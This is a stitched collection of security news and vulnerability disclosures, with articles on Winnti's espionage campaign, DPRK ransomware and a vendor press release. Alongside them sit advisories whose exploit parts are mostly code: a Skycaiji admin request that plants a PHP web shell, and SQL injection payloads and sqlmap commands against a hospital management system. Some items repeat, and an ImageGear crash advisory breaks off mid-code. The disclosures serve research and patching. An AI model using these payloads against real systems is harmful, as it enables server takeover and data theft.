A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.

A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.

Researchers from Cybereason’s Nocturnus Team have uncovered a massive, highly successful, three-year-long campaign of intellectual property theft.

The perpetrators were likely able to siphon hundreds of gigabytes worth of “sensitive proprietary information from technology and manufacturing companies mainly in East Asia, Western Europe, and North America,” according to the report released Wednesday.

The theft remained completely under the radar from law enforcement. They pulled it off by combining an “arsenal” of malware – including a brand new strain called DEPLOYLOG – into a complex infection chain.

The researchers attributed the campaign, with “moderate-to-high confidence,” to the Winnti group (aka APT 41, BARIUM,  or Blackfly). Winnti is “an exceptionally capable adversary” that is “believed to be operating on behalf of Chinese state interests and specializes in cyberespionage and intellectual property theft.”

**A Highly Successful Heist**

Researchers believe the campaign has been ongoing, traced back to 2019.

They said the Winnti began their attacks by exploiting a popular enterprise resource planning (ERP) platform used by their targets. With this foothold they installed web shells – to establish persistence – then began their reconnaissance and credential theft. With a map of the network and privileged credentials, they could move laterally to access sensitive stores of data. All of these are common strategies used by APTs around the world every day.

What distinguished Winnti’s attacks was in the details.

For one thing, they leveraged multiple vulnerabilities in that undisclosed ERP platform. Some of the vulnerabilities were publicly known, but some were zero-days.

The infection chain they crafted from there is of particular note. The researchers called it a “house of cards” – “a sophisticated and unique multi-staged infection chain with numerous payloads. Each payload fulfills a unique role in the infection chain, which is successful only upon the complete deployment of all of the payloads.”

As an example, one of these cards is DEPLOYLOG: a previously undocumented malware strain. First it’s introduced to the host machine by another module, PRIVATELOG. Then, in turn, it drops a rootkit – WINNKIT – and opens up a line of communication between the rootkit and Winnti’s command and control servers.

WINNKIT, ultimately, is what’s most important here. “A driver acting as a rootkit,” it contains a host of useful tools for transferring data from a host machine, modifying files, killing processes and much more. And despite being known to cyber analysts, the researchers noted, it possesses a near-zero detection rate in VirusTotal.

As we can see, each stage of this chain was sophisticated in and of itself. But it was their house of cards-style arrangement that made this campaign “almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order.”

**Stolen Data Costly and Dangerous**

Winnti primarily went after American, European, and Asian technology companies and manufacturers. They went for intellectual property “including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data,” according to the report.

It’s clear that the haul was massive, and it’s partly for that reason that the researchers couldn’t determine the exact number of organizations affected, and the precise financial impact incurred by them.

The other reason why they couldn’t gauge the combined cost is that many costs may be yet to come. Beyond commercial IP, “the attackers collected information that could be used for future cyberattacks, such as details about the target company’s business units, network architecture, user accounts and credentials, employee emails and customer data.”

To avoid further Winnti attacks in years to come, targeted organizations will need to update all those employee credentials, adjust that architecture, and root out any potential backdoors. If even one hole is left over, they’ll remain vulnerable.

****Aging APT Still Packs a Punch****

Winnti is one of the oldest APTs still in business, with malicious campaigns dating back a dozen years already.

In their early years they primarily targeted gaming companies in Southeast Asia, stealing in-game currencies and then flipping them for real life profits.

Notorious for their “stealth, sophistication, and focus on stealing technology secrets,” the APT has been known to compromise digital certificates – the electronic documents meant to ensure authenticity between connected devices  – and deploy bootkits – which nuzzle into the innermost parts of a computer’s motherboard: the master boot record – to poison supply chains and even target specific individuals.

These were already advanced tactics, but their newest campaign is the groups most sophisticated to date.

China-linked APT Caught Pilfering Treasure Trove of IP

Researchers use code, Bitcoin transactions to link ransomware attacks on banks to DPRK-sponsored actors.

A new ransomware strain called VHD has been traced to North Korean state actor APT38 by a team of researchers using detailed code analysis and following a Bitcoin trail. 

The Democratic People's Republic of Korea (DPRK) has used ransomware for several years to raise money for state coffers, including the February 2016 Bangladesh bank heist in which attackers tried to use the SWIFT banking system to steal almost US$1 billion, explains Trellix researcher Christiaan Beek in a new blog post. 

Beek and a team of fellow cybersecurity analysts linked North Korea's cyber army to the VHD ransomware, which they said has been used in ransomware attacks on global financial systems and cryptocurrency exchanges since March 2020. The analysts compared known DPRK code with VHD ransomware and found stark similarities, the post states. Bitcoin transactions overlapping between known DPRK-sponsored cybercrime groups were also reported by the team. 

"We suspect the ransomware families described in this blog are part of more organized attacks," Beek adds. "Based on our research, combined intelligence, and observations of the smaller targeted ransomware attacks, Trellix attributes them to DPRK affiliated hackers with high confidence."  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

New Ransomware Variant Linked to North Korean Cyber Army

Companies see AI-powered cybersecurity tools and systems as the future, but at present nearly 90% of them say they face significant hurdles in making use of them.

Companies are quickly adopting cybersecurity products and systems that incorporate artificial intelligence (AI) and machine learning, but the technology comes with significant challenges, and it can't replace human analysts, experts say.

In a Wakefield Research survey published this week, for example, almost half of IT security professionals (46%) said their AI-based systems create too many false positives to handle, 44% complained that critical events are not properly flagged, and 41% do not know what to do with AI outputs. In total, 89% of companies reported challenges with cybersecurity solutions that claimed to have AI capabilities.  

    

Source: Devo

Not all AI-based projects are created equal, as some technology is more mature, says Gunter Ollmann, chief security officer at Devo, which sponsored the survey.

"When they talk about rolling out AI for cybersecurity ... those are the projects that are commonly failing," he says. "In particular, NLP \[natural language processing\] is being dangled as a technology that can do cool things for your security and as a way to manage your attack surface area, but it has not really been successful."

**The Promised Benefits of AI for Cybersecurity  
**Incorporating machine-learning and AI features into cybersecurity products has been widely heralded as a way for companies to gain more visibility into attacks on their data and infrastructure, and as a way to respond more quickly. In December, for example, business consultancy Deloitte called the trend toward more AI in cybersecurity to be a way of taming the complexities in today's business infrastructure, which includes more devices, more cloud services, and more employees working from home.

"Cyber AI can be a force multiplier that enables organizations not only to respond faster than attackers can move, but also to anticipate these moves and react to them in advance," the consultancy stated.  

The most mature uses of machine learning in cybersecurity products are for the detection of threats on the endpoint and user and entity behavior analytics (UEBA) to pinpoint risky users and compromised devices, says Allie Mellen, security and risk analyst for Forrester Research, a business intelligence firm.

**AI Security Challenges Abound**  
While finding and classifying IT assets topped the list of uses of AI-based cybersecurity — with 79% of companies using the technology for that application — it also topped the list of challenges, with 53% of respondents considering the use case problematic, according to Wakefield Research's survey of 200 IT security professionals.

About a third of companies had challenges in correctly deploying the systems, and a quarter criticized the vendors for not updating the product enough to be valuable.

There are definitely differences in opinions between business executives, who largely consider AI to be a perfect solution, and security analysts on the ground, who have to deal with the day-to-day reality, says Devo's Ollmann.

"In the trenches, the AI part is not fulfilling the expectations and the hopes of better triaging, and in the meantime, the AI that is being used to detect threats is working almost too well," he says. "We see the net volume of alerts and incidents that are making it into the SOC analysts hands is continuing to increase, while the capacity to investigate and close those cases has remained static."

The continuing challenges that come with AI features mean that companies still do not trust the technology. A majority of companies (57%) are relying on AI features more or much more than they should, compared with only 14% who do not use AI enough, according to respondents to the survey.

In addition, few security teams have turned on automated response, partly because of this lack of trust, but also because automated response requires a tighter integration between products that just is not there yet, says Ollman.

**Augmentation, Not Replacement  
**Another dimension of the AI challenge is a lack of clarity on its role vis a vis security staff. While AI applications can deliver real benefits, it's important to understand that they augment the human analyst in the security operations center (SOC) rather than replace them, Forrester's Mellen stresses. That's a conclusion many companies likely do not want to hear, given the problems many have in hiring knowledgeable cybersecurity professionals.

"The most important resource that we have are the people that we have working today in the SOC," Mellen says. "AI helps, of course, for detection ... but we have to recognize that it is not going to be a complete game changer for security. The way that we use machine learning today is not even at the point where it would be able to take over most of the responsibilities of the human analyst."

Devo's Ollman also cautioned that organizations need to have realistic expectations for what AI can and cannot do.  

"I think there is the sci-fi view that AI will be a superhuman that operates at 1,000 times faster than the best human alive; leave that for the sci-fi books," he says. "Augmentation is about how do I make the human faster and more efficient in what they are doing, and also closing skills gaps that they have."

The challenges all suggest that trained human analysts, with expertise in machine learning and AI, are needed to make best use of AI-augmented cybersecurity products. And AI systems that can explain their conclusions will be necessary in the future to augment human analysts and retain trust, Ollmann says.

AI for Cybersecurity Shimmers With Promise, but Challenges Abound

Skycaiji v2.4 was discovered to contain a remote code execution (RCE) vulnerability via /SkycaijiApp/admin/controller/Develop.php.

**Vulnerability conditions**

*   Website Admin permissions

**Vulnerability details**

Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()

Code:

    ...
    else{
    				
    				$module=input('module');
    				$copyright=input('copyright');
    				$identifier=input('identifier');
    				$name=input('name');
    				$methods=input('methods/a',array());
    				
    				if(empty($module)){
    					$this->error('请选择类型');
    				}
    				
    				$module=$mfuncApp->format_module($module);
    				$copyright=$mfuncApp->format_copyright($copyright);
    				$identifier=$mfuncApp->format_identifier($identifier);
    				
    				if(!$mfuncApp->right_module($module)){
    					$this->error('类型错误');
    				}
    				if(!$mfuncApp->right_identifier($identifier)){
    					$this->error('功能标识只能由字母或数字组成，且首个字符必须是字母！');
    				}
    				if(!$mfuncApp->right_copyright($copyright)){
    					$this->error('作者版权只能由字母或数字组成，且首个字符必须是字母！');
    				}
    				
    				$newMethods=array();
    				foreach ($methods['method'] as $k=>$v){
    					if(preg_match('/^[a-z\_]\w*/',$v)){
    						
    						foreach ($methods as $mk=>$mv){
    							
    							$newMethods[$mk][$k]=$mv[$k];
    						}
    					}
    				}
    				$methods=$newMethods;
    				unset($newMethods);
    				
    				if(empty($methods['method'])){
    					$this->error('请添加方法！');
    				}
    				
    				$app=$mfuncApp->app_name($copyright,$identifier);
    				
    				$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
    				
    				if($id>0){
    					$this->success('创建成功','Develop/func?app='.$app);
    				}else{
    					$this->error('创建失败');
    				}
    			}
    		}
    ....
    

Vulnerability key code:

    $app=$mfuncApp->app_name($copyright,$identifier);
    $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));`
    

�  
follow up $mfuncApp->app\_name  
  
Concatenate $copyright, $identifier directly, then return.  
Go back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));

follow up $mfuncApp->createApp

$module,$app,array('name'=>$name,'methods'=>$methods)

And the parameters we can control,follow up  
$funcFile=$this->filename($module,$app);  

Return directly after splicing

Continue back to the createApp function  

There is no filter /\* and \*/ for variables $name  
/plugin/func/$module/$copyright$identifier.php

Exp is constructed directly here:

    POST /index.php?s=/Admin/Develop/func HTTP/1.1
    Host: 172.16.49.3:50004
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 179
    Origin: http://172.16.49.3:50004
    Connection: close
    Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
    Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df
    
    _usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
    

  
check the file  

Visit /plugin/func/downloadImg/A11B1.php  
post: a=command

CVE-2022-28096: Remote code execution vulnerability in /SkycaijiApp/admin/controller/Develop.php · Issue #39 · zorlan/skycaiji

An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.
Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.
Targets included technology and

An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019.

Dubbed "**Operation CuckooBees**" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information.

Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

"The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said.

"In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data."

Winnti, also tracked by other cybersecurity vendors under the names APT41, Axiom, Barium, and Bronze Atlas, is known to be active since at least 2007.

"The group's intent is towards theft of intellectual property from organizations in developed economies, and with moderate confidence that this is on behalf of China to support decision making in a range of Chinese economic sectors," Secureworks notes in a threat profile of the actor.

The multi-phased infection chain documented by Cybereason involves the exploitation of internet-facing servers to deploy a web shell with the goal of conducting reconnaissance, lateral movement, and data exfiltration activities.

It's both complex and intricate, following a "house of cards" approach in that each component of the killchain depends on other modules in order to function, rendering analysis exceedingly difficult.

"This demonstrates the thought and effort that was put into both the malware and operational security considerations, making it almost impossible to analyze unless all pieces of the puzzle are assembled in the correct order," the researchers explained.

The data harvesting is facilitated by means of a modular loader called Spyder, which is used to decrypt and load additional payloads. Also used are four different payloads — STASHLOG, SPARKLOG, PRIVATELOG, and DEPLOYLOG — that are sequentially deployed to drop the WINNKIT, a kernel-level rootkit.

Crucial to the stealthiness of the campaign is the use of "rarely seen" techniques such as the abuse of Windows Common Log File System (CLFS) mechanism to stash the payloads, enabling the hacking group to conceal their payloads and evade detection by traditional security products.

Interestingly, parts of the attack sequence were previously detailed by Mandiant in September 2021, while pointing out the misuse of CLFS to hide second-stage payloads in an attempt to circumvent detection.

The cybersecurity firm attributed the malware to an unknown actor, but cautioned that it could have been deployed as part of a highly targeted activity.

"Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant said at the time. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."

WINNKIT, for its part, has a compilation timestamp of May 2019 and has almost zero detection rate in VirusTotal, highlighting the evasive nature of the malware that enabled the authors to stay undiscovered for years.

The ultimate goal of the intrusions, the researchers assessed, is to siphon proprietary information, research documents, source code, and blueprints for various technologies.

"Winnti is one of the most industrious groups operating on behalf of Chinese state-aligned interests," Cybereason said. "The threat \[actor\] employed an elaborate, multi-stage infection chain that was critical to enabling the group to remain undetected for so long."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies

The security research partnership will focus on developing new techniques and releasing them as open source.

Aryaka and CyLab, Carnegie Mellon University’s Security and Privacy Institute, announced a strategic partnership to research new threat mitigation techniques and develop new enterprise networking and security solutions.

Under the partnership, Aryaka will provide funding and industry experts to assist more than 100 faculty members and 100 graduate students with research to identify, prioritize, and develop threat mitigation techniques. The hope is to make these techniques available as open source to help enterprises and security vendors to better defend against cyberattacks, CyLab’s Daniel Tkacik wrote.

The modern IT landscape is very different from when users were in offices and applications were in data centers, said Renuka Nadkarni, Aryaka’s chief product officer. Applications are now anywhere and users can access those applications regardless of their geographic location. Security needs to be reconsidered in the case of the application and not the network.

Aryaka is also the founding sponsor of CyLab’s Future Enterprise Security Initiative, a multi-disciplinary approach to making complex security solutions available and accessible. The initiative’s mission is to rethink “security across enterprise ecosystems through innovations in artificial intelligence, computer science, engineering, and human factors research,” Tkacik wrote.

Founded in 2003, CyLab is a public/private collaborative computer security and privacy research institute and is one of the largest security research centers in the US. Aryaka decided to partner with CyLab because of the university’s work in artificial intelligence and machine learning as well as in other fields such as humanities, psychology, and policy, said David Ginsburg, Aaryaka’s VP of product and solutions marketing. A multi-disciplinary approach gives researchers the opportunity to look at problems not just from the technology point of view, but to also consider attacker motivations and intent.

Aryaka will guide research topics, offer industry expertise, provide data sets for building AI models, and give feedback on techniques being developed.

Aryaka, Carnegie Mellon’s CyLab to Research New Threat Mitigation Techniques

IT Teams can now manage, detect, and secure all endpoints with 100% visibility across desktop, laptop, server, and mobile devices.

  
ALISO VIEJO, Calif. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more.

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices).

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status.

Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.

Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.

Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network.

Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.

Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly.

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxsense.com

Syxsense Enterprise Unifies Endpoint Security and IT Management for Real-Time Vulnerability Monitoring and Remediation

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.

****Hospital-Management-System v1.0 - SQLi******Vendor**

**Description:**

The vulnerability page is admin.php

http://you ip/HMS/admin.php

Hospital-Management-System v1.0

The adminname parameter in the admin.php page appears to be vulnerable to SQL injection attacks.

\[+\]sqlmap:

python3 sqlmap.py -r Your post packet.txt --random-agent --risk=3 --level=3 -dbs

\[+\] Payloads:

    Parameter: adminname ((custom) POST)
        Type: error-based
        Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
        Payload: adminname=admin' AND EXTRACTVALUE(4756,CONCAT(0x5c,0x717a706a71,(SELECT (ELT(4756=4756,1))),0x7170707a71)) AND 'hOiE'='hOiE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: adminname=admin' AND (SELECT 3117 FROM (SELECT(SLEEP(5)))xtHJ) AND 'beHE'='beHE&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    ---
    

\[+\]Post request package

    POST /HMS/admin.php HTTP/1.1
    Host: 192.168.10.7
    Content-Length: 119
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.10.7
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.10.7/HMS/admin.php
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    adminname=admin1&loginid=admin1&password=123456789&cnfirmpassword=123456789&select=Active&submit=%E6%8F%90%E4%BA%A4
    
    

**In action:**

**Proof and Exploit:**

href

CVE-2022-27413: GitHub - HH1F/Hospital-Management-System-V1.0-SQLi

Syxsense Enterprise delivers real-time vulnerability monitoring and remediation for all endpoints across an organization’s entire network.

**ALISO VIEJO, Calif**. – \[May 3, 2022\] – Syxsense, a global leader in IT and security management solutions, today announced Syxsense Enterprise™, the world’s first IT management and endpoint security solution that delivers real-time vulnerability monitoring and instant remediation for every endpoint across an organization’s entire network environment. Syxsense Enterprise combines Syxsense Secure, Manage, and Mobile Device Manager to deliver a completely unified platform that scans and manages all endpoints, resolves problems in real-time, and reduces the risks associated with system misconfigurations. This enables organizations to better predict, identify, and remediate vulnerabilities.

“As threats get more complex, it’s important that IT teams have consolidated solutions for IT management and endpoint security. Syxsense Enterprise is designed to give them a centralized cloud-based platform for scanning, patching, recognizing, and remediating vulnerabilities that could lead to attack or exploitation of endpoints,” said Ashley Leonard, Founder and CEO at Syxsense. “By offering our customers a unified cloud solution, we enable complete control over every endpoint device on the network so they can secure business-critical resources quickly and streamline security operations.”

Syxsense Enterprise is the industry’s first Unified Security and Endpoint Management (USEM) solution that addresses the three key elements of endpoint security – vulnerabilities, patch, and compliance. It layers on a powerful workflow automation tool called Syxsense Cortex™ that remediates and eliminates endpoint security weaknesses – all through a single cloud-based, drag and drop management interface, with hundreds of prebuilt workflows. This includes the ability to identify software vulnerabilities in both OS and 3rd party applications, misconfigurations from open ports, disabled firewalls, ineffective user account polices and more. 

It also includes Syxsense’s recently launched Mobile Device Management (MDM) solution, which allows IT to manage devices running on iOS, iPadOS, and Android, in addition to previously supported Windows, Linux and Mac environments. Syxsense MDM includes all the tools necessary for Device Enrollment, Inventory and Configuration Management, Application Deployment and Rollback, Data Containerization, and Remote Device Lock/Reset/Wipe (making it possible for IT to wipe sensitive data from lost or stolen devices). 

“As the market shifts to a hybrid workforce, the number of endpoints is growing exponentially, with corporate network connected mobile endpoints soaring,” said Charles Kolodgy, principal at advisory firm Security Mindsets. “The need to manage and secure an increasing number of endpoints, including desktops, mobile phones and other devices, is becoming more apparent every day as sophisticated threats grow exponentially. Syxsense Enterprise is offering a solution that solves the need to both secure and manage a vast collection of endpoints. The key is the ability to scan for vulnerabilities and patch without losing business continuity.”

The key features of Syxsense Enterprise include:

*   Vulnerability Scanning – Prevent cyberattacks by identifying scanning authorization issues, security implementation problems, and antivirus status. 
*   Patch Everything – Automatically deploy OS and third-party patches to remediate all endpoint vulnerabilities inside the network and on roaming devices outside the network.
*   Prove Compliance and Device Health – Document patching with reporting for risk assessments, vulnerable devices, task summaries and more. And scan and prioritize patching relative to risk exposure.
*   Quarantine Devices – Block communication for an infected device, isolate endpoints, and kill malicious processes before they impact the network. 
*   Control All Mobile Devices – Oversee devices remotely, silently push OTA configurations, applications, and policies from iOS to Android to Windows and more.
*   Collaborate with Ease – IT and security teams can now collaborate in a single console to identify and close endpoint attack vectors quickly. 

For more details or to schedule a demo, visit: https://www.syxsense.com/gc-demo-syxsense

**About Syxsense**

Syxsense is a leading provider of innovative, intuitive endpoint security and management technology that combines the power of artificial intelligence with industry expertise to help customers predict and remove security threats across all devices including mobile. Syxsense is the first unified security and endpoint management platform that centralizes the three key elements of endpoint security management (vulnerabilities, patch and compliance) and layers on a powerful workflow automation tool called Syxsense Cortex,™ all through a single cloud-based platform, enabling greater efficiency and collaboration between teams. The always-on technology performs in real-time so businesses can operate free of disruption from security breaches that cripple productivity and expose them to financial risk and reputational harm. For more information, visit www.syxse

Syxsense Launches Unified Endpoint Security and Management Platform

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A stack-based buffer overflow vulnerability exists in the IGXMPXMLParser::parseDelimiter functionality of Accusoft ImageGear 19.10. A specially-crafted PSD file can overflow a stack buffer, which could either lead to denial of service or, depending on the application, to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

7.1 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

**CWE**

CWE-193 - Off-by-one Error

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed PSD file, we end up with the following situation:

    (758.8fc): C++ EH exception - code e06d7363 (first chance)
    ModLoad: 75590000 75610000   C:\Windows\SysWOW64\uxtheme.dll
    
    STATUS_STACK_BUFFER_OVERRUN encountered
    (758.8fc): Break instruction exception - code 80000003 (first chance)
    eax=00000000 ebx=711732c8 ecx=76ae01c0 edx=0018ea2d esi=00000000 edi=000039ac
    eip=76adffa1 esp=0018ec74 ebp=0018ecf0 iopl=0         nv up ei pl zr na pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
    kernel32!UnhandledExceptionFilter+0x5f:
    76adffa1 cc              int     3
    

This kind of error STATUS_STACK_BUFFER_OVERRUN indicates an abnormal program termination. Looking at the call stack may indicate the culprit.

    0:000> kb
    ChildEBP RetAddr  Args to Child              
    0018ecf0 71ace2d9 711732c8 0018ed0c 7110c698 kernel32!UnhandledExceptionFilter+0x5f
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Talos Vrt Team\ImageGearFuzzing\bin\igCore19d.dll - 
    0018ecfc 7110c698 711732c8 00000001 0018f03c MSVCR110!__crtUnhandledException+0x14
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0018ed0c 7110c7af 711732c8 029c02d0 029c95e0 igCore19d!IG_GUI_page_title_set+0x3c5e8
    0018f03c 71089a04 029c76bd 029c3f8a 4848482f igCore19d!IG_GUI_page_title_set+0x3c6ff
    0018f150 7108950c 029c0150 0018f1e8 029c0348 igCore19d!IG_mpi_page_set+0x12d9d4
    0018f16c 7108966f 029c765d 000039ac 00000001 igCore19d!IG_mpi_page_set+0x12d4dc
    0018f1b8 7109003d 0018fc54 029c0150 00000000 igCore19d!IG_mpi_page_set+0x12d63f
    0018f670 7104cd0b 0018fc54 1000001e 029c0348 igCore19d!IG_mpi_page_set+0x13400d
    0018f738 7104c242 0018fc54 1000001e 029c0098 igCore19d!IG_mpi_page_set+0xf0cdb
    0018f774 7104bcba 0018fc54 0018f79c 0018f7c4 igCore19d!IG_mpi_page_set+0xf0212
    0018fbcc 70f313d9 0018fc54 029c0060 00000001 igCore19d!IG_mpi_page_set+0xefc8a
    0018fc04 70f708d7 00000000 029c0060 0018fc54 igCore19d!IG_image_savelist_get+0xb29
    0018fe80 70f70239 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0018fea0 70f05757 00000000 00308230 00000001 igCore19d!IG_mpi_page_set+0x14209
    *** WARNING: Unable to verify checksum for Fuzzme.exe
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for Fuzzme.exe - 
    0018fec0 00402219 00308230 0018fed4 00000001 igCore19d!IG_load_file+0x47
    0018fed8 00402524 00308230 0018ff10 003079a8 Fuzzme!fuzzme+0x19
    0018ff40 0040668d 00000005 003066a8 003079a8 Fuzzme!fuzzme+0x324
    0018ff88 76aa33ca 7efde000 0018ffd4 77d19ed2 Fuzzme!fuzzme+0x448d
    0018ff94 77d19ed2 7efde000 7741e483 00000000 kernel32!BaseThreadInitThunk+0xe
    0018ffd4 77d19ea5 00406715 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
    0018ffec 00000000 00406715 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b
    

Investigating the callback stack leads us to the function pointed by igCore19d!IG_mpi_page_set+0x12d9d4, which points to the end to the following pseudo code function at LINE165 pointed by the call to security_check_cookie :

    LINE1   void __thiscall IGXMPXMLParser::FUN_74239720(IGXMPXMLParser *this)
    LINE2   {
    LINE3     char cVar1;
    LINE4     void *pvVar2;
    LINE5     code *pcVar3;
    LINE6     bool bVar4;
    LINE7     int iVar5;
    LINE8     int iVar6;
    LINE9     char *pcVar7;
    LINE10    char *pcVar8;
    LINE11    char *pcVar9;
    LINE12    char *local_10c;
    LINE13    char buffer_ovw [256];
    LINE14    uint stack_canary;
    LINE15    
    LINE16    stack_canary = DAT_7435cea8 ^ (uint)&stack0xfffffffc;
    LINE17    pcVar7 = this->field2_0x8;
    LINE18    pcVar9 = pcVar7 + this->field3_0xc;
    LINE19    bVar4 = false;
    LINE20    this->field10_0x1c = pcVar7;
    LINE21    pcVar8 = pcVar7;
